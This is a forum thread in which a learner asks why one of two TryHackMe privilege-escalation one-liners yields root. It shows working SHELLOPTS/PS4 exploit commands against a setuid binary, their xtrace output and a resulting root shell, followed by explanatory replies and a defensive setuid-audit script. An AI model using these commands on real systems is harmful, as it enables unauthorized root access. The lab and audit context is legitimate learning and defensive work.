Stuck trying to understand a command that simulates privesc

I'm stuck on a command. I'm trying to do task 14, method 2, from here https://tryhackme.com/room/linuxprivescarena but I fail to understand it.

```text
TCM@debian:/tmp$ env -i SHELLOPTS=xtrace PS4='$(cp /bin/bash /tmp && chmod +s /tmp/bash )' /bin/sh -c '/usr/local/bin/suid-env2; set +x; /tmp/bash -p'
/usr/local/bin/suid-env2
/usr/sbin/service apache2 start
basename /usr/sbin/service
VERSION='service ver. 0.91-ubuntu1'
basename /usr/sbin/service
USAGE='Usage: service < option > | --status-all | [ service_name [ command | --full-restart ] ]'
SERVICE=
ACTION=
SERVICEDIR=/etc/init.d
OPTIONS=
'[' 2 -eq 0 ']'
cd /
'[' 2 -gt 0 ']'
case "${1}" in
'[' -z '' -a 2 -eq 1 -a apache2 = --status-all ']'
'[' 2 -eq 2 -a start = --full-restart ']'
'[' -z '' ']'
SERVICE=apache2
shift
'[' 1 -gt 0 ']'
case "${1}" in
'[' -z apache2 -a 1 -eq 1 -a start = --status-all ']'
'[' 1 -eq 2 -a '' = --full-restart ']'
'[' -z apache2 ']'
'[' -z '' ']'
ACTION=start
shift
'[' 0 -gt 0 ']'
'[' -r /etc/init/apache2.conf ']'
'[' -x /etc/init.d/apache2 ']'
exec env -i LANG= PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin TERM=dumb /etc/init.d/apache2 start
Starting web server: apache2httpd (pid 1723) already running
.
set +x
TCM@debian:/tmp$ id
uid=1000(TCM) gid=1000(user) groups=1000(user),24(cdrom),25(floppy),29(audio),30(dip),44(video),46(plugdev)
```

and

```text
TCM@debian:/tmp$ env -i SHELLOPTS=xtrace PS4='$(cp /bin/bash /tmp && chown root.root /tmp/bash && chmod +s /tmp/bash)' /bin/sh -c '/usr/local/bin/suid-env2; set +x; /tmp/bash -p'
chown: changing ownership of `/tmp/bash': Operation not permitted
/usr/local/bin/suid-env2
/usr/sbin/service apache2 start
basename /usr/sbin/service
VERSION='service ver. 0.91-ubuntu1'
basename /usr/sbin/service
USAGE='Usage: service < option > | --status-all | [ service_name [ command | --full-restart ] ]'
SERVICE=
ACTION=
SERVICEDIR=/etc/init.d
OPTIONS=
'[' 2 -eq 0 ']'
cd /
'[' 2 -gt 0 ']'
case "${1}" in
'[' -z '' -a 2 -eq 1 -a apache2 = --status-all ']'
'[' 2 -eq 2 -a start = --full-restart ']'
'[' -z '' ']'
SERVICE=apache2
shift
'[' 1 -gt 0 ']'
case "${1}" in
'[' -z apache2 -a 1 -eq 1 -a start = --status-all ']'
'[' 1 -eq 2 -a '' = --full-restart ']'
'[' -z apache2 ']'
'[' -z '' ']'
ACTION=start
shift
'[' 0 -gt 0 ']'
'[' -r /etc/init/apache2.conf ']'
'[' -x /etc/init.d/apache2 ']'
exec env -i LANG= PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin TERM=dumb /etc/init.d/apache2 start
Starting web server: apache2httpd (pid 1723) already running
.
cp: cannot create regular file `/tmp/bash': Permission denied
set +x
bash-4.1# id
uid=1000(TCM) gid=1000(user) euid=0(root) egid=0(root) groups=0(root),24(cdrom),25(floppy),29(audio),30(dip),44(video),46(plugdev),1000(user)
```

Why can't I gain root with command 1, but command 2 can? The only difference between them is "chown root.root /tmp/bash", and that part doesn't even execute here: "chown: changing ownership of `/tmp/bash': Operation not permitted".

Can anyone explain the answer to me?

What do you mean? Why did you expect that you would have root access after executing the first command?

You need root access to execute the 2nd command (the chown part). If you don't have it, you will receive "Operation not permitted" (as you already encountered).


Because the original command to practice is command 2 (the command gets root privilege, as this TryHackMe room teaches), and command 1 is just the part I adjusted. I don't know what problem causes command 1 to fail. I tried adding the "chown part" and removing it between the two commands to observe its behavior. I see that the version with the "chown part" gives me root privilege, even though the "chown part" still fails because I don't have enough privilege, and until now I still don't understand the scheme behind why this difference (having the chown part or not) can escalate privilege.

I don't think you understand it correctly. chown doesn't grant you root privilege; it changes the ownership of a file/folder to root (meaning the root user owns that file/folder).

Actually, you misunderstood the purpose of the command. Command #2 is not designed to grant you root access. It helps you set up a copy of the /bin/bash file which can run with escalated privilege (in this case, as the root user). In other words, you can trigger the bash command using /tmp/bash as if you were "root".

To run command #2, root privilege is required to grant ownership of /tmp/bash to root. Combined with "chmod +s" (which grants the setuid permission, so you can run that /tmp/bash with the effective user ID of the file owner, in this case root), it helps you achieve what I said earlier. Without the "chown root.root" (command #1), your command loses its purpose (you set up /tmp/bash to run using your own user ID, which you can do anyway), and without root privilege, you cannot change the ownership to root (command #2).

Hope it helps!

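The setuid semantics the reply above describes, as an added defender-side example that is not part of the thread or the TryHackMe room: it predicts the effective UID a caller gets from a file's owner, mode and mount flags (which is why a user-owned setuid /tmp/bash leaves you at uid 1000 while a root-owned one yields euid 0), and it sweeps a directory for setuid executables as an audit check. The uid values 1000 and 0 are taken from the thread's `id` output; the function names and the `nosuid` handling are my own.

```python
import os
import stat

# Values constructed from the thread: the TryHackMe user is uid 1000, root is 0.
USER_UID = 1000
ROOT_UID = 0


def predict_effective_uid(owner_uid, mode, caller_uid, nosuid=False):
    """Effective UID obtained when `caller_uid` executes a file with this owner/mode.

    Only the setuid bit on an executable file changes the euid, and only to the
    owner's uid, so a setuid file you own buys nothing. The kernel ignores the
    bit on nosuid mounts. Note that bash itself resets euid to uid unless run
    with -p, which is why the thread invokes /tmp/bash -p.
    """
    is_exec = bool(mode & (stat.S_IXUSR | stat.S_IXGRP | stat.S_IXOTH))
    if nosuid or not is_exec or not (mode & stat.S_ISUID):
        return caller_uid
    return owner_uid


def mount_has_nosuid(path):
    """True if the mount containing `path` carries nosuid (reads /proc/mounts on Linux)."""
    best_mp, best_opts = "", ""
    try:
        with open("/proc/mounts") as fh:
            for line in fh:
                fields = line.split()
                if len(fields) < 4:
                    continue
                mp = fields[1]
                under = path == mp or path.startswith(mp.rstrip("/") + "/")
                if under and len(mp) > len(best_mp):  # longest prefix wins
                    best_mp, best_opts = mp, fields[3]
    except OSError:
        return False
    return "nosuid" in best_opts.split(",")


def audit_path(path, caller_uid):
    """Stat a real file and report the euid `caller_uid` would get executing it."""
    st = os.stat(path)
    nosuid = mount_has_nosuid(os.path.abspath(path))
    return predict_effective_uid(st.st_uid, st.st_mode, caller_uid, nosuid)


def find_setuid_files(directory):
    """Audit sweep: (path, owner_uid) for every regular setuid file under `directory`."""
    hits = []
    for root, _dirs, files in os.walk(directory):
        for name in files:
            p = os.path.join(root, name)
            try:
                st = os.lstat(p)
            except OSError:
                continue
            if stat.S_ISREG(st.st_mode) and st.st_mode & stat.S_ISUID:
                hits.append((p, st.st_uid))
    return hits
```

Running `find_setuid_files("/tmp")` on a host and comparing owners against the caller's uid is the same check the answer makes by hand; mounting /tmp with nosuid makes both outcomes identical.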

Ohh!!! I didn't realize until now what the purpose of those commands is. The commands are just setup; the crucial part is somewhere else. Thank you so much for explaining it to me! :laughing: :laughing:
